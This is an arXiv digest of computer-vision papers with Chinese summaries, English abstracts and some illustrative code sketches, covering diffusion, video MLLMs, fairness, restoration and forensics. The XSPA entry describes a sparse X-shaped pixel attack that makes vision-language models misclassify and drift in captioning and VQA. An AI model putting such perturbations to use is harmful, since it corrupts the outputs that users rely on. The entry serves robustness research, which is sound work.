【速读】:该论文旨在解决当前扩散模型(Diffusion Models)在移动端部署时面临的两大问题:一是模型参数量庞大导致的高延迟和部署困难;二是现有轻量化模型多仅支持文本到图像(Text-to-Image, T2I)生成,缺乏对图像编辑任务的支持。解决方案的关键在于提出DreamLite——一个参数仅为0.39B的统一式轻量级扩散模型,其核心创新包括:基于剪枝后的移动U-Net骨干网络,并通过潜空间中的上下文空间拼接(in-context spatial concatenation)实现条件统一建模;输入端采用“目标 | 空白”(target | blank)配置用于生成任务,“目标 | 源图”(target | source)配置用于编辑任务;同时引入任务渐进联合预训练策略以稳定小模型训练,并结合步骤蒸馏(step distillation)将去噪过程压缩至仅4步,从而实现在小米14手机上<1秒内完成1024×1024图像的生成或编辑,成为首个支持两端任务的轻量级统一模型。
链接: https://arxiv.org/abs/2603.28713
作者: Kailai Feng,Yuxiang Wei,Bo Chen,Yang Pan,Hu Ye,Songwei Liu,Chenqian Yan,Yuan Gao
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: this https URL
Abstract:Diffusion models have made significant progress in both text-to-image (T2I) generation and text-guided image editing. However, these models are typically built with billions of parameters, leading to high latency and increased deployment challenges. While on-device diffusion models improve efficiency, they largely focus on T2I generation and lack support for image editing. In this paper, we propose DreamLite, a compact unified on-device diffusion model (0.39B) that supports both T2I generation and text-guided image editing within a single network. DreamLite is built on a pruned mobile U-Net backbone and unifies conditioning through in-context spatial concatenation in the latent space. It concatenates images horizontally as input, using a (target | blank) configuration for generation tasks and (target | source) for editing tasks. To stabilize the training of this compact model, we introduce a task-progressive joint pretraining strategy that sequentially targets T2I, editing, and joint tasks. After high-quality SFT and reinforcement learning, DreamLite achieves GenEval (0.72) for image generation and ImgEdit (4.11) for image editing, outperforming existing on-device models and remaining competitive with several server-side models. By employing step distillation, we further reduce denoising processing to just 4 steps, enabling our DreamLite could generate or edit a 1024 x 1024 image in less than 1s on a Xiaomi 14 smartphone. To the best of our knowledge, DreamLite is the first unified on-device diffusion model that supports both image generation and image editing.
[CV-10] AdaptToken: Entropy-based Adaptive Token Selection for MLLM Long Video Understanding
【速读】:该论文旨在解决多模态大语言模型(Multi-modal Large Language Models, MLLMs)在长视频理解任务中因内存开销高和上下文长度限制而导致的性能瓶颈问题。现有方法通过评分与选择短片段内的帧或标记来缓解此问题,但缺乏跨远距离视频片段的相关性比较机制以及在收集足够证据后提前停止处理的能力。其解决方案的关键在于提出一种无需训练的框架 AdaptToken,该框架将 MLLM 的自不确定性转化为全局控制信号以实现高效的 token 选择:首先将视频分组,利用跨模态注意力对每组内 token 排序,并基于模型响应熵估计每组提示的相关性;该熵信号不仅支持跨组的全局 token 预算分配,还进一步支撑早期停止策略(AdaptToken-Lite),在模型达到足够置信度时跳过剩余分组,显著降低推理时间(约减少一半)且保持相近性能。
链接: https://arxiv.org/abs/2603.28696
作者: Haozhe Qi,Kevin Qu,Mahdi Rad,Rui Wang,Alexander Mathis,Marc Pollefeys
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Project page: this https URL
Abstract:Long video understanding remains challenging for Multi-modal Large Language Models (MLLMs) due to high memory costs and context-length limits. Prior approaches mitigate this by scoring and selecting frames/tokens within short clips, but they lack a principled mechanism to (i) compare relevance across distant video clips and (ii) stop processing once sufficient evidence has been gathered. We propose AdaptToken, a training-free framework that turns an MLLM’s self-uncertainty into a global control signal for long-video token selection. AdaptToken splits a video into groups, extracts cross-modal attention to rank tokens within each group, and uses the model’s response entropy to estimate each group’s prompt relevance. This entropy signal enables a global token budget allocation across groups and further supports early stopping (AdaptToken-Lite), skipping the remaining groups when the model becomes sufficiently certain. Across four long-video benchmarks (VideoMME, LongVideoBench, LVBench, and MLVU) and multiple base MLLMs (7B-72B), AdaptToken consistently improves accuracy (e.g., +6.7 on average over Qwen2.5-VL 7B) and continues to benefit from extremely long inputs (up to 10K frames), while AdaptToken-Lite reduces inference time by about half with comparable performance. Project page: this https URL
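熵驱动的预算分配与提前停止可用如下草图示意;其中"对负熵做 softmax"的加权方式与固定阈值均为示意性假设,并非 AdaptToken 的精确规则:

```python
import math

def response_entropy(probs):
    """Entropy of the model's answer distribution for one video group."""
    return -sum(p * math.log(p) for p in probs if p > 0)

def allocate_budget(entropies, total_tokens, tau=1.0):
    """Softmax over negative entropy: groups where the model is more
    certain (assumed more prompt-relevant) get a larger token share."""
    w = [math.exp(-h / tau) for h in entropies]
    s = sum(w)
    return [round(total_tokens * wi / s) for wi in w]

def early_stop(entropies, threshold=0.3):
    """Index of the first group at which confidence suffices to stop
    (AdaptToken-Lite skips the remaining groups)."""
    for k, h in enumerate(entropies):
        if h < threshold:
            return k
    return len(entropies) - 1

ent = [response_entropy(p) for p in ([0.5, 0.5], [0.9, 0.1], [0.99, 0.01])]
budget = allocate_budget(ent, total_tokens=1000)
stop_at = early_stop(ent)
```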
[CV-11] Why Aggregate Accuracy is Inadequate for Evaluating Fairness in Law Enforcement Facial Recognition Systems
【速读】:该论文旨在解决当前面部识别系统在执法和安保等高风险场景中,仅依赖整体准确率(aggregate accuracy)作为评估指标所导致的公平性被忽视的问题。研究表明,即使系统整体准确率较高,其在不同人口群体中的错误率(如假阳性率 FPR 和假阴性率 FNR)仍可能存在显著差异,从而引发系统性偏见和潜在危害。解决方案的关键在于引入子群层面(subgroup-level)的误差分布分析,并采用公平感知的评估方法与模型无关的审计策略(model-agnostic auditing strategies),以实现对实际部署系统在真实环境下的公正性和可靠性进行有效监测与改进。
链接: https://arxiv.org/abs/2603.28675
作者: Khalid Adnan Alsayed
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 9 pages, 2 tables, 1 figure. Position paper with empirical subgroup analysis highlighting limitations of aggregate accuracy in fairness evaluation
Abstract:Facial recognition systems are increasingly deployed in law enforcement and security contexts, where algorithmic decisions can carry significant societal consequences. Despite high reported accuracy, growing evidence demonstrates that such systems often exhibit uneven performance across demographic groups, leading to disproportionate error rates and potential harm. This paper argues that aggregate accuracy is an insufficient metric for evaluating the fairness and reliability of facial recognition systems in high-stakes environments. Through analysis of subgroup-level error distribution, including false positive rate (FPR) and false negative rate (FNR), the paper demonstrates how aggregate performance metrics can obscure critical disparities across demographic groups. Empirical observations show that systems with similar overall accuracy can exhibit substantially different fairness profiles, with subgroup error rates varying significantly despite a single aggregate metric. The paper further examines the operational risks associated with accuracy-centric evaluation practices in law enforcement applications, where misclassification may result in wrongful suspicion or missed identification. It highlights the importance of fairness-aware evaluation approaches and model-agnostic auditing strategies that enable post-deployment assessment of real-world systems. The findings emphasise the need to move beyond accuracy as a primary metric and adopt more comprehensive evaluation frameworks for responsible AI deployment.
[CV-12] Sim-to-Real Fruit Detection Using Synthetic Data: Quantitative Evaluation and Embedded Deployment with Isaac Sim
【速读】:该论文旨在解决在数据受限和嵌入式部署约束条件下,如何有效利用合成数据(synthetic data)提升目标检测模型从仿真到现实世界(sim-to-real transfer)的迁移性能问题。其解决方案的关键在于采用混合训练策略(hybrid training),即结合有限的真实水果图像与在NVIDIA Isaac Sim中生成的合成数据来训练YOLO-based检测模型,从而在保持较高检测精度的同时显著减少对人工标注数据的依赖,并通过TensorRT优化实现Jetson Orin NX平台上的实时推理性能。
链接: https://arxiv.org/abs/2603.28670
作者: Martina Hutter-Mironovova
机构: YASKAWA Europe GmbH
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注: 18 pages, 6 figures
Abstract:This study investigates the effectiveness of synthetic data for sim-to-real transfer in object detection under constrained data conditions and embedded deployment requirements. Synthetic datasets were generated in NVIDIA Isaac Sim and combined with limited real-world fruit images to train YOLO-based detection models under real-only, synthetic-only, and hybrid regimes. Performance was evaluated on two test datasets: an in-domain dataset with conditions matching the training data and a domain shift dataset containing real fruit and different background conditions. Results show that models trained exclusively on real data achieve the highest accuracy, while synthetic-only models exhibit reduced performance due to a domain gap. Hybrid training strategies significantly improve performance compared to synthetic-only approaches and achieve results close to real-only training while reducing the need for manual annotation. Under domain shift conditions, all models show performance degradation, with hybrid models providing improved robustness. The trained models were successfully deployed on a Jetson Orin NX using TensorRT optimization, achieving real-time inference performance. The findings highlight that synthetic data is most effective when used in combination with real data and that deployment constraints must be considered alongside detection accuracy.
[CV-13] Industrial3D: A Terrestrial LiDAR Point Cloud Dataset and Cross-Paradigm Benchmark for Industrial Infrastructure
【速读】:该论文旨在解决工业领域机电设备(MEP)设施中地面激光扫描(TLS)点云的自动语义理解难题,这是实现建筑信息模型(BIM)自动化、数字孪生构建及竣工验证等关键任务的前提。现有基准数据集(如S3DIS或ScanNet)无法充分反映水处理厂、冷冻机房等场景中存在的极端几何模糊性、严重遮挡和类别分布极度不均衡等问题。解决方案的关键在于构建了目前规模最大、最具有挑战性的工业LiDAR点云数据集Industrial3D,包含61200万条专家标注点,分辨率达6 mm,并建立了首个跨范式的工业场景基准测试体系,涵盖全监督、弱监督、无监督及基础模型等多种学习范式。实验表明,当前最优监督方法仅达到55.74% mIoU,而零样本Point-SAM仅为15.79%,揭示出工业TLS数据域迁移仍面临巨大挑战;系统分析指出该差距源于双重困境:类别统计稀疏性(类别不平衡达215:1,比S3DIS更严重3.5倍)与几何歧义性(尾部类别的点与头部类别的管道共享柱面特征),单纯基于频率的重加权策略无法有效缓解。
链接: https://arxiv.org/abs/2603.28660
作者: Chao Yin,Hongzhe Yue,Qing Han,Difeng Hu,Zhenyu Liang,Fangzhou Lin,Bing Sun,Boyu Wang,Mingkai Li,Wei Yao,Jack C.P. Cheng
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 49 pages, 8 figure, 14 tables
Abstract:Automated semantic understanding of dense point clouds is a prerequisite for Scan-to-BIM pipelines, digital twin construction, and as-built verification–core tasks in the digital transformation of the construction industry. Yet for industrial mechanical, electrical, and plumbing (MEP) facilities, this challenge remains largely unsolved: TLS acquisitions of water treatment plants, chiller halls, and pumping stations exhibit extreme geometric ambiguity, severe occlusion, and extreme class imbalance that architectural benchmarks (e.g., S3DIS or ScanNet) cannot adequately represent. We present Industrial3D, a terrestrial LiDAR dataset comprising 612 million expertly labelled points at 6 mm resolution from 13 water treatment facilities. At 6.6x the scale of the closest comparable MEP dataset, Industrial3D provides the largest and most demanding testbed for industrial 3D scene understanding to date. We further establish the first industrial cross-paradigm benchmark, evaluating nine representative methods across fully supervised, weakly supervised, unsupervised, and foundation model settings under a unified benchmark protocol. The best supervised method achieves 55.74% mIoU, whereas zero-shot Point-SAM reaches only 15.79%–a 39.95 percentage-point gap that quantifies the unresolved domain-transfer challenge for industrial TLS data. Systematic analysis reveals that this gap originates from a dual crisis: statistical rarity (215:1 imbalance, 3.5x more severe than S3DIS) and geometric ambiguity (tail-class points share cylindrical primitives with head-class pipes) that frequency-based re-weighting alone cannot resolve. Industrial3D, along with benchmark code and pre-trained models, will be publicly available at this https URL.
[CV-14] Divide and Restore: A Modular Task-Decoupled Framework for Universal Image Restoration
【速读】:该论文旨在解决多类型图像退化(如噪声、模糊或曝光不当)恢复任务中,现有复杂单体架构因任务间干扰导致性能下降及训练成本高昂的问题。其解决方案的关键在于提出一种模块化、任务解耦的图像恢复框架,通过显式诊断路由机制实现动态决策:一个轻量级卷积神经网络(CNN)分类器对输入图像进行评估,并将其引导至专门的修复节点(如U-Net专家)。该设计使不同退化类型的重建路径相互隔离,避免特征冲突,同时具备模型无关的可扩展性——新增退化类型仅需训练单一专家并更新路由器,无需重新训练整个系统,从而显著降低训练开销并提升效率。
链接: https://arxiv.org/abs/2603.28658
作者: Joanna Wiekiera,Martyna Zur
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Restoring images affected by various types of degradation, such as noise, blur, or improper exposure, remains a significant challenge in computer vision. While recent trends favor complex monolithic all-in-one architectures, these models often suffer from negative task interference and require extensive joint training cycles on high-end computing clusters. In this paper, we propose a modular, task-decoupled image restoration framework based on an explicit diagnostic routing mechanism. The architecture consists of a lightweight Convolutional Neural Network (CNN) classifier that evaluates the input image and dynamically directs it to a specialized restoration node. A key advantage of this framework is its model-agnostic extensibility: while we demonstrate it using three independent U-Net experts, the system allows for the integration of any restoration method tailored to specific tasks. By isolating reconstruction paths, the framework prevents feature conflicts and significantly reduces training overhead. Unlike monolithic models, adding new degradation types in our framework only requires training a single expert and updating the router, rather than a full system retraining. Experimental results demonstrate that this computationally accessible approach offers a scalable and efficient solution for multi-degradation restoration on standard local hardware. The code will be published upon paper acceptance.
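诊断路由的思路可用几行代码示意;下面的分类启发式与专家占位函数分别对应论文中的轻量级 CNN 路由器和 U-Net 专家,仅作示意:

```python
def diagnose(image_stats):
    """Stand-in for the lightweight CNN classifier (router)."""
    if image_stats["noise_level"] > 0.5:
        return "denoise"
    if image_stats["sharpness"] < 0.3:
        return "deblur"
    return "exposure"

# Independent experts; any task-specific restorer could be plugged in.
EXPERTS = {
    "denoise":  lambda img: f"denoised({img})",
    "deblur":   lambda img: f"deblurred({img})",
    "exposure": lambda img: f"exposure_fixed({img})",
}

def restore(img, stats):
    task = diagnose(stats)
    return EXPERTS[task](img)

out = restore("photo.png", {"noise_level": 0.8, "sharpness": 0.9})
```

新增一种退化类型只需向 `EXPERTS` 注册一个新专家并更新路由器,无需重训整个系统,这正是该框架相对单体模型的核心优势。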
[CV-15] TGIF2: Extended Text-Guided Inpainting Forgery Dataset Benchmark
【速读】:该论文旨在解决生成式 AI(Generative AI)驱动的文本引导修复(text-guided inpainting)对图像取证技术带来的新挑战,特别是针对完全再生(Fully Regenerated, FR)图像中篡改定位(Image Forgery Localization, IFL)能力不足的问题。现有方法在拼接类伪造图像上表现良好,但在FR图像上失效;而合成图像检测(Synthetic Image Detection, SID)虽能识别FR图像,却无法定位篡改区域。解决方案的关键在于构建TGIF2数据集——其扩展了原始TGIF数据集,引入FLUX.1模型生成的修复内容及随机非语义掩码(random non-semantic masks),从而支持更全面的取证评估。实验表明,当前IFL和SID方法在FLUX.1操纵下性能下降,说明泛化能力有限;尽管微调可提升FR图像上的定位效果,但随机掩码测试暴露了对象偏倚问题;此外,生成式超分辨率显著削弱了取证痕迹,揭示了常见图像增强操作对现有取证流程的破坏性影响。因此,TGIF2为理解现代AI图像编辑与取证鲁棒性之间的鸿沟提供了重要基准。
链接: https://arxiv.org/abs/2603.28613
作者: Hannes Mareen,Dimitrios Karageorgiou,Paschalis Giakoumoglou,Peter Lambert,Symeon Papadopoulos,Glenn Van Wallendael
机构: University of Ghent (根特大学); Institute of Informatics and Telecommunications (信息学与电信研究所)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Cryptography and Security (cs.CR); Multimedia (cs.MM)
备注: 33 pages, accepted at Journal on Information Security
Abstract:Generative AI has made text-guided inpainting a powerful image editing tool, but at the same time a growing challenge for media forensics. Existing benchmarks, including our text-guided inpainting forgery (TGIF) dataset, show that image forgery localization (IFL) methods can localize manipulations in spliced images but struggle in fully regenerated (FR) images, while synthetic image detection (SID) methods can detect fully regenerated images but cannot perform localization. With new generative inpainting models emerging and the open problem of localization in FR images remaining, updated datasets and benchmarks are needed. We introduce TGIF2, an extended version of TGIF that captures recent advances in text-guided inpainting and enables a deeper analysis of forensic robustness. TGIF2 augments the original dataset with edits generated by FLUX.1 models, as well as with random non-semantic masks. Using the TGIF2 dataset, we conduct a forensic evaluation spanning IFL and SID, including fine-tuning IFL methods on FR images and generative super-resolution attacks. Our experiments show that both IFL and SID methods degrade on FLUX.1 manipulations, highlighting limited generalization. Additionally, while fine-tuning improves localization on FR images, evaluation with random non-semantic masks reveals object bias. Furthermore, generative super-resolution significantly weakens forensic traces, demonstrating that common image enhancement operations can undermine current forensic pipelines. In summary, TGIF2 provides an updated dataset and benchmark, which enables new insights into the challenges posed by modern inpainting and AI-based image enhancements. TGIF2 is available at this https URL.
[CV-16] Unsafe2Safe: Controllable Image Anonymization for Downstream Utility CVPR2026
【速读】:该论文旨在解决大规模图像数据集中存在的隐私风险问题,即在训练模型时可能因记忆和泄露敏感内容(如人脸、文本信息或可识别的个体特征)而导致隐私侵犯。其解决方案的关键在于提出一个全自动化的隐私保护流水线Unsafe2Safe,该方法通过两阶段流程实现:第一阶段利用视觉-语言模型检测隐私风险并生成包含敏感属性(private caption)与去标识化(public caption)的配对描述,同时由大语言模型生成结构化的、无身份指向的编辑指令;第二阶段采用基于文本提示的扩散编辑器,以双文本提示(私有与公共描述)驱动图像局部重写,在保留全局结构和任务相关语义的同时中性化敏感区域。该方案实现了高隐私保护强度(显著降低人脸相似度、文本相似度及人口统计学可预测性)与下游任务性能之间的平衡,且无需牺牲视觉一致性或数据可用性。
链接: https://arxiv.org/abs/2603.28605
作者: Mih Dinh,SouYoung Jin
机构: Dartmouth College (达特茅斯学院)
类目: Computer Vision and Pattern Recognition (cs.CV); Computers and Society (cs.CY); Machine Learning (cs.LG)
备注: Accepted at CVPR 2026 and CVPR 2026 Workshop on Machine Unlearning for Computer Vision
Abstract:Large-scale image datasets frequently contain identifiable or sensitive content, raising privacy risks when training models that may memorize and leak such information. We present Unsafe2Safe, a fully automated pipeline that detects privacy-prone images and rewrites only their sensitive regions using multimodally guided diffusion editing. Unsafe2Safe operates in two stages. Stage 1 uses a vision-language model to (i) inspect images for privacy risks, (ii) generate paired private and public captions that respectively include and omit sensitive attributes, and (iii) prompt a large language model to produce structured, identity-neutral edit instructions conditioned on the public caption. Stage 2 employs instruction-driven diffusion editors to apply these dual textual prompts, producing privacy-safe images that preserve global structure and task-relevant semantics while neutralizing private content. To measure anonymization quality, we introduce a unified evaluation suite covering Quality, Cheating, Privacy, and Utility dimensions. Across MS-COCO, Caltech101, and MIT Indoor67, Unsafe2Safe reduces face similarity, text similarity, and demographic predictability by large margins, while maintaining downstream model accuracy comparable to training on raw data. Fine-tuning diffusion editors on our automatically generated triplets (private caption, public caption, edit instruction) further improves both privacy protection and semantic fidelity. Unsafe2Safe provides a scalable, principled solution for constructing large, privacy-safe datasets without sacrificing visual consistency or downstream utility.
[CV-17] ELViS: Efficient Visual Similarity from Local Descriptors that Generalizes Across Domains ICLR2026
【速读】:该论文旨在解决大规模实例级训练数据稀缺导致模型在跨域图像检索中泛化能力不足的问题。现有方法通常依赖特定领域的训练数据,难以适应真实场景中多样化的未见领域(unseen domains)。其解决方案的关键在于提出ELViS模型,该模型在相似度空间(similarity space)而非表示空间(representation space)中进行操作,通过利用局部描述符对应关系,结合数据相关的最优传输(optimal transport)机制以抑制无信息描述符,并通过投票机制聚合强对应关系生成图像级相似度,从而引入强归纳偏置(inductive biases),实现高效、可解释且跨域迁移能力强的图像相似性建模。
链接: https://arxiv.org/abs/2603.28603
作者: Pavel Suma,Giorgos Kordopatis-Zilos,Yannis Kalantidis,Giorgos Tolias
机构: Czech Technical University in Prague (捷克技术大学); NAVER LABS Europe (NAVER实验室欧洲)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: ICLR 2026
Abstract:Large-scale instance-level training data is scarce, so models are typically trained on domain-specific datasets. Yet in real-world retrieval, they must handle diverse domains, making generalization to unseen data critical. We introduce ELViS, an image-to-image similarity model that generalizes effectively to unseen domains. Unlike conventional approaches, our model operates in similarity space rather than representation space, promoting cross-domain transfer. It leverages local descriptor correspondences, refines their similarities through an optimal transport step with data-dependent gains that suppress uninformative descriptors, and aggregates strong correspondences via a voting process into an image-level similarity. This design injects strong inductive biases, yielding a simple, efficient, and interpretable model. To assess generalization, we compile a benchmark of eight datasets spanning landmarks, artworks, products, and multi-domain collections, and evaluate ELViS as a re-ranking method. Our experiments show that ELViS outperforms competing methods by a large margin in out-of-domain scenarios and on average, while requiring only a fraction of their computational cost. Code available at: this https URL
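ELViS "最优传输精炼 + 强对应投票"的相似度计算流程,可以用如下玩具示例近似。其中 Sinkhorn 迭代次数、温度参数与投票阈值均为示意性假设,与论文的实际设计(含数据相关增益项)并不等同:

```python
import numpy as np

def sinkhorn(sim, eps=0.1, n_iters=20):
    """对局部描述子相似度矩阵做交替行/列归一化, 得到近似双随机的传输计划。"""
    P = np.exp(sim / eps)
    for _ in range(n_iters):
        P /= P.sum(axis=1, keepdims=True)   # 行归一化
        P /= P.sum(axis=0, keepdims=True)   # 列归一化
    return P

def image_similarity(desc_a, desc_b):
    sim = desc_a @ desc_b.T          # 局部描述子两两相似度
    P = sinkhorn(sim)                # 最优传输步骤抑制无信息对应
    votes = (P > P.mean()) * sim     # 仅保留强对应参与"投票"
    return float(np.clip(votes, 0.0, None).sum())  # 聚合为图像级相似度

a = np.eye(4)                        # 玩具描述子: 与自身存在一一对应
b = np.full((4, 4), 0.5)             # 玩具描述子: 无判别性对应
self_score = image_similarity(a, a)
cross_score = image_similarity(a, b)
```

由于模型在相似度空间而非表示空间中运算,这一流程不依赖特定域的特征分布,直观上解释了其跨域迁移能力。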
[CV-18] Detection of Adversarial Attacks in Robotic Perception
【速读】:该论文旨在解决深度神经网络(Deep Neural Networks, DNNs)在机器人感知任务中进行语义分割时对对抗攻击的脆弱性问题,此类攻击可能危及安全关键应用。解决方案的关键在于针对机器人场景下语义分割的特殊需求,设计专用的模型架构与检测策略,以提升模型在复杂环境中的鲁棒性。
链接: https://arxiv.org/abs/2603.28594
作者: Ziad Sharawy,Mohammad Nakshbandi,Sorin Mihai Grigorescu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Cryptography and Security (cs.CR); Robotics (cs.RO)
备注: 9 pages, 6 figures. Accepted and presented at STE 2025, Transilvania University of Brasov, Romania
Abstract:Deep Neural Networks (DNNs) achieve strong performance in semantic segmentation for robotic perception but remain vulnerable to adversarial attacks, threatening safety-critical applications. While robustness has been studied for image classification, semantic segmentation in robotic contexts requires specialized architectures and detection strategies.
[CV-19] ORSIFlow: Saliency-Guided Rectified Flow for Optical Remote Sensing Salient Object Detection ICME2026
【速读】:该论文旨在解决光学遥感图像显著目标检测(Optical Remote Sensing Image Salient Object Detection, ORSI-SOD)中因复杂背景、低对比度、不规则目标形状及尺度变化大所带来的挑战。现有判别式方法直接回归显著图,而基于扩散的生成式方法则存在随机采样和高计算成本的问题。其解决方案的关键在于提出ORSIFlow框架,将ORSI-SOD重构为一个确定性的潜在流生成问题:通过冻结的变分自编码器(Variational Autoencoder, VAE)构建紧凑潜在空间,在该空间内进行高效推理(仅需几步即可完成显著掩码生成);同时设计了显著特征判别器(Salient Feature Discriminator)以增强全局语义区分能力,并引入显著特征校准器(Salient Feature Calibrator)实现边界精调,从而在多个公开基准上实现最优性能与显著效率提升。
链接: https://arxiv.org/abs/2603.28584
作者: Haojing Chen,Yutong Li,Zhihang Liu,Tao Tan,Haoyu Bian,Qiuju Ma
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by ICME 2026
Abstract:Optical Remote Sensing Image Salient Object Detection (ORSI-SOD) remains challenging due to complex backgrounds, low contrast, irregular object shapes, and large variations in object scale. Existing discriminative methods directly regress saliency maps, while recent diffusion-based generative approaches suffer from stochastic sampling and high computational cost. In this paper, we propose ORSIFlow, a saliency-guided rectified flow framework that reformulates ORSI-SOD as a deterministic latent flow generation problem. ORSIFlow performs saliency mask generation in a compact latent space constructed by a frozen variational autoencoder, enabling efficient inference with only a few steps. To enhance saliency awareness, we design a Salient Feature Discriminator for global semantic discrimination and a Salient Feature Calibrator for precise boundary refinement. Extensive experiments on multiple public benchmarks show that ORSIFlow achieves state-of-the-art performance with significantly improved efficiency. Codes are available at: this https URL.
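整流流(rectified flow)之所以支持"少步数确定性推理",在于其学习到的速度场轨迹接近直线,欧拉积分几步即可逼近终点。下面用一个人为构造的二维玩具速度场演示这一点(速度场并非训练所得,仅作积分过程的示意):

```python
import numpy as np

def euler_sample(v_field, x0, n_steps):
    """沿速度场做 n_steps 步欧拉积分, 时间 t 从 0 积到 1。"""
    x, dt = x0.astype(float).copy(), 1.0 / n_steps
    for i in range(n_steps):
        t = i * dt
        x = x + dt * v_field(x, t)
    return x

target = np.array([1.0, -2.0])
# 玩具速度场: 其积分轨迹恰好在 t=1 处收敛到 target
v = lambda x, t: (target - x) / max(1.0 - t, 1e-3)
x1 = euler_sample(v, np.zeros(2), n_steps=4)   # 仅 4 步
```

在 ORSIFlow 中,这类少步积分发生在 VAE 构建的紧凑潜在空间内,而非像素空间,这是其效率优势的另一来源。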
[CV-20] Navigating the Mirage: A Dual-Path Agentic Framework for Robust Misleading Chart Question Answering
【速读】:该论文旨在解决视觉-语言模型(Vision-Language Models, VLMs)在图表解读中因视觉结构欺骗性和数据表示失真而导致的误导性问题。其核心挑战在于模型易受扭曲的图表设计干扰,从而产生错误推理。解决方案的关键在于提出一种代理式双路径框架 ChartCynics,通过将感知与验证解耦:诊断视觉路径(Diagnostic Vision Path)利用策略性感兴趣区域(ROI)裁剪识别结构异常(如坐标轴翻转),而OCR驱动的数据路径(OCR-Driven Data Path)确保数值信息的准确锚定;进一步引入代理总结器(Agentic Summarizer),通过两阶段优化协议——Oracle-Informed SFT用于推理蒸馏,Deception-Aware GRPO实现对抗对齐——有效惩罚视觉陷阱并强化跨模态逻辑一致性,显著提升模型鲁棒性与准确性。
链接: https://arxiv.org/abs/2603.28583
作者: Yanjie Zhang,Yafei Li,Rui Sheng,Zixin Chen,Yanna Lin,Huamin Qu,Lei Chen,Yushi Sun
机构: HKUST(香港科技大学); HKUST(GZ)(香港科技大学(广州))
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Multimedia (cs.MM)
备注: 10pages, 4 figures
Abstract:Despite the success of Vision-Language Models (VLMs), misleading charts remain a significant challenge due to their deceptive visual structures and distorted data representations. We present ChartCynics, an agentic dual-path framework designed to unmask visual deception via a “skeptical” reasoning paradigm. Unlike holistic models, ChartCynics decouples perception from verification: a Diagnostic Vision Path captures structural anomalies (e.g., inverted axes) through strategic ROI cropping, while an OCR-Driven Data Path ensures numerical grounding. To resolve cross-modal conflicts, we introduce an Agentic Summarizer optimized via a two-stage protocol: Oracle-Informed SFT for reasoning distillation and Deception-Aware GRPO for adversarial alignment. This pipeline effectively penalizes visual traps and enforces logical consistency. Evaluations on two benchmarks show that ChartCynics achieves 74.43% and 64.55% accuracy, providing an absolute performance boost of ~29% over the Qwen3-VL-8B backbone, outperforming state-of-the-art proprietary models. Our results demonstrate that specialized agentic workflows can grant smaller open-source models superior robustness, establishing a new foundation for trustworthy chart interpretation.
[CV-21] XSPA: Crafting Imperceptible X-Shaped Sparse Adversarial Perturbations for Transferable Attacks on VLMs
【速读】:该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)在面对高度约束、稀疏且几何固定扰动时的鲁棒性问题。现有研究表明,VLMs 依赖共享的视觉-文本表征空间实现跨任务泛化,但这一特性也可能导致微小的视觉扰动在嵌入空间中传播并引发多任务语义失效,尤其在交互式决策支持场景中构成潜在风险。为更严格地评估这种脆弱性,作者提出 X 形稀疏像素攻击(X-shaped Sparse Pixel Attack, XSPA),其关键在于:在极小扰动预算下(仅修改约 1.76% 像素),将扰动限制于两条相交对角线构成的结构化区域,并联合优化分类目标、跨任务语义引导及扰动幅度与沿线平滑性的正则项,从而诱导出可迁移的误分类以及图像描述和视觉问答(Visual Question Answering, VQA)中的语义漂移,同时保持视觉隐蔽性。实验表明,XSPA 在 COCO 数据集上显著降低多个任务性能,揭示了当前多模态系统在对抗扰动下的显著鲁棒性缺口。
链接: https://arxiv.org/abs/2603.28568
作者: Chengyin Hu,Jiaju Han,Xuemeng Sun,Qike Zhang,Yiwei Wei,Ang Li,Chunlei Meng,Xiang Chen,Jiahuan Long
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Vision-language models (VLMs) rely on a shared visual-textual representation space to perform tasks such as zero-shot classification, image captioning, and visual question answering (VQA). While this shared space enables strong cross-task generalization, it may also introduce a common vulnerability: small visual perturbations can propagate through the shared embedding space and cause correlated semantic failures across tasks. This risk is particularly important in interactive and decision-support settings, yet it remains unclear whether VLMs are robust to highly constrained, sparse, and geometrically fixed perturbations. To address this question, we propose X-shaped Sparse Pixel Attack (XSPA), an imperceptible structured attack that restricts perturbations to two intersecting diagonal lines. Compared with dense perturbations or flexible localized patches, XSPA operates under a much stricter attack budget and thus provides a more stringent test of VLM robustness. Within this sparse support, XSPA jointly optimizes a classification objective, cross-task semantic guidance, and regularization on perturbation magnitude and along-line smoothness, inducing transferable misclassification as well as semantic drift in captioning and VQA while preserving visual subtlety. Under the default setting, XSPA modifies only about 1.76% of image pixels. Experiments on the COCO dataset show that XSPA consistently degrades performance across all three tasks. Zero-shot accuracy drops by 52.33 points on OpenAI CLIP ViT-L/14 and 67.00 points on OpenCLIP ViT-B/16, while GPT-4-evaluated caption consistency decreases by up to 58.60 points and VQA correctness by up to 44.38 points. These results suggest that even highly sparse and visually subtle perturbations with fixed geometric priors can substantially disrupt cross-task semantics in VLMs, revealing a notable robustness gap in current multimodal systems.
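XSPA 将扰动支撑限制在两条相交对角线上。下面的掩码构造仅为几何示意(线宽固定为 1 像素,取整方式为假设),其稀疏度与论文默认约 1.76% 的像素预算并不严格对应:

```python
import numpy as np

def x_mask(h, w):
    """构造由主/反对角线组成的 X 形布尔掩码 (线宽 1 像素)。"""
    m = np.zeros((h, w), dtype=bool)
    for i in range(h):
        j = round(i * (w - 1) / (h - 1)) if h > 1 else 0
        m[i, j] = True           # 主对角线
        m[i, w - 1 - j] = True   # 反对角线
    return m

mask = x_mask(224, 224)
sparsity = mask.mean()           # 被允许扰动的像素占比
```

实际攻击只在 `mask` 为 True 的位置优化扰动值,其余像素保持不变,从而在极小预算下检验 VLM 的鲁棒性。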
